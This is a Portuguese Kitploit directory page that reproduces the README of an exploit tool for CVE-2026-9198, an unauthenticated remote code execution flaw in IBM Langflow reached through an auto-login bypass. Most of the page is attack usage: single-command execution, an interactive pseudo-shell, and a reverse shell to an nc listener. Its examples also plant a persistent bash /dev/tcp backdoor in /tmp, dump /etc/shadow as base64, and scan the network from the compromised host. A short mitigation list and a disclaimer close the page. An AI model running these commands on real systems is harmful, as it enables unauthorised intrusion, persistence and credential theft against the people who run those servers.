Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-9198 — IBM Langflow RCE Não Autenticado via Bypass de Login Automático | Kitploit
Ferramentas/GitHubGitHub/0xgh057r3c0n/cve-2026-9198
Geração de PayloadsExploraçãoExploração de Aplicações WebComando e ControleAutenticaçãoRed TeamingFerramenta de Acesso Remoto
GitHub0xgh057r3c0n/cve-2026-9198

CVE-2026-9198

IBM Langflow RCE Não Autenticado via Bypass de Login Automático

Ver Repositório
11há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Langflow Logo

🚨 CVE-2026-9198

IBM Langflow OSS RCE Não Autenticado via Bypass de Auto-Login

License: MIT Python 3.6+ Security


📋 Visão Geral

CVE-2026-9198 é uma vulnerabilidade crítica de Execução Remota de Código (RCE) não autenticada no IBM Langflow OSS. Este exploit combina duas vulnerabilidades:

  • CVE-2026-9103: Bypass de auto-login que concede tokens JWT de superusuário a chamadores não autenticados
  • CVE-2026-8481: Injeção de código no endpoint /api/v1/validate/code que permite execução arbitrária de Python

⚠️ AVISO: Esta ferramenta é apenas para testes de segurança autorizados e fins educacionais. O uso não autorizado é ilegal.


🚀 Recursos

  • 🔓 Bypass de auto-login - Obtém automaticamente o token JWT de superusuário
  • 💻 Pseudo-shell interativo - Prompt dinâmico com nome de usuário e diretório atual
  • 📝 Execução de comando único - Execute comandos arbitrários do sistema
  • 🔄 Reverse shell - Entrega de payload de shell reversa em uma linha
  • 🎨 Saída colorida - Feedback visual com cores ANSI
  • ⚡ Rápido e confiável - Construído com tratamento robusto de erros

📦 Instalação

Pré-requisitos

  • Python 3.6 ou superior
  • Gerenciador de pacotes pip

Passo 1: Clonar o Repositório

root@kitploit:~
git clone https://github.com/0xgh057r3c0n/CVE-2026-9198.git
cd CVE-2026-9198

Passo 2: Instalar Dependências

root@kitploit:~
pip install termcolor

Ou instale todas as dependências de uma vez:

root@kitploit:~
pip install -r requirements.txt

Passo 3: Verificar a Instalação

root@kitploit:~
python CVE-2026-9198.py --help

Você deve ver o menu de ajuda com todas as opções disponíveis.


🎯 Uso

Execução Básica de Comandos

Execute um único comando no alvo:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> -c "id"

Exemplo:

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "whoami"

Pseudo-Shell Interativo

Inicie um shell interativo com prompts dinâmicos:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> --shell

Recursos:

  • Prompt dinâmico mostrando user@host e o diretório atual
  • Suporte ao comando cd com atualização automática do prompt
  • Histórico de comandos (dependendo do terminal)
  • Formatação de saída limpa

Exemplo de sessão:

root@kitploit:~
┌─[root@0xgh057r3c0n]─[~]
└──╼ $ whoami
root
┌─[root@0xgh057r3c0n]─[~]
└──╼ $ cd /tmp
┌─[root@0xgh057r3c0n]─[/tmp]
└──╼ $ pwd
/tmp

Shell Reversa

Envie um payload de shell reversa para um listener:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> --lhost <your_ip> --lport <port>

Exemplo:

root@kitploit:~
# On your machine - Start listener
nc -lvnp 4444

# Then run the exploit
python CVE-2026-9198.py -t 192.168.1.100 --lhost 192.168.1.50 --lport 4444

Porta Personalizada

Se o Langflow estiver rodando em uma porta não padrão:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> -p <port> -c "whoami"

Exemplo:

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -p 8080 -c "ls -la"

Usando um Token Obtido Anteriormente

Pule o processo de auto-login e use um token existente:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> -k <your_jwt_token> -c "id"

Configuração de Timeout

Ajuste o timeout HTTP para redes mais lentas:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> --timeout 30 -c "whoami"

📝 Argumentos de Linha de Comando

ArgumentoDescriçãoObrigatórioPadrão
-t, --targetHost/IP alvo ou URL completa✅ Sim-
-p, --portPorta do Langflow❌ Não7860
-c, --cmdExecuta um único comando❌ Não"id"
--shellModo pseudo-shell interativo❌ NãoFalse
--lhostIP do listener do shell reverso❌ Não-
--lportPorta do listener do shell reverso❌ Não4444
-k, --tokenUsa o token bearer fornecido❌ Não-
--timeoutTimeout HTTP em segundos❌ Não20
--no-bannerOculta o banner❌ NãoFalse

🔧 Exemplos

1. Coleta Básica de Informações

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "uname -a"

2. Exploração do Sistema de Arquivos

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 --shell
# Then inside the shell:
ls -la
cat /etc/passwd

3. Backdoor Persistente

root@kitploit:~
# Create a reverse shell that persists
python CVE-2026-9198.py -t 192.168.1.100 -c "echo 'bash -i >& /dev/tcp/192.168.1.50/4444 0>&1' > /tmp/backdoor.sh && chmod +x /tmp/backdoor.sh && /tmp/backdoor.sh"

4. Varredura de Rede (a partir do alvo)

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "nmap -sP 192.168.1.0/24"

5. Exfiltração de Arquivos Sensíveis

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "cat /etc/shadow | base64"

🛡️ Mitigação

Para se proteger contra esta vulnerabilidade:

  1. Desative o auto-login em ambientes de produção
  2. Aplique os patches lançados pela IBM para o Langflow
  3. Restrinja o acesso de rede às interfaces administrativas do Langflow
  4. Monitore solicitações incomuns à API para /api/v1/auto_login e /api/v1/validate/code
  5. Use regras de WAF para bloquear padrões de payload suspeitos

⚠️ Aviso Legal

Esta ferramenta é fornecida apenas para fins educacionais e de testes de segurança autorizados. O autor não é responsável por qualquer uso indevido ou dano causado por este software. Os usuários são os únicos responsáveis por cumprir as leis e regulamentos aplicáveis.


📄 Licença

Este projeto está licenciado sob a Licença MIT - consulte o arquivo LICENSE para obter detalhes.


👨‍💻 Autor

0xgh057r3c0n

  • GitHub: @0xgh057r3c0n
  • Pesquisador de Segurança e Pentester

📚 Referências

  • Detalhes do CVE-2026-9198
  • CVE-2026-9103 - Bypass de Auto-Login
  • CVE-2026-8481 - Injeção de Código
  • Site Oficial do Langflow

🤝 Contribuição

Contribuições são bem-vindas! Sinta-se à vontade para enviar um Pull Request.

  1. Fork o repositório
  2. Crie sua branch de recurso (git checkout -b feature/AmazingFeature)
  3. Faça commit das suas alterações (git commit -m 'Add some AmazingFeature')
  4. Envie para a branch (git push origin feature/AmazingFeature)
  5. Abra um Pull Request

⭐ Histórico de Estrelas

Se você achar esta ferramenta útil, considere dar uma ⭐ no GitHub!


Feito com ❤️ por 0xgh057r3c0n
Baixar ferramenta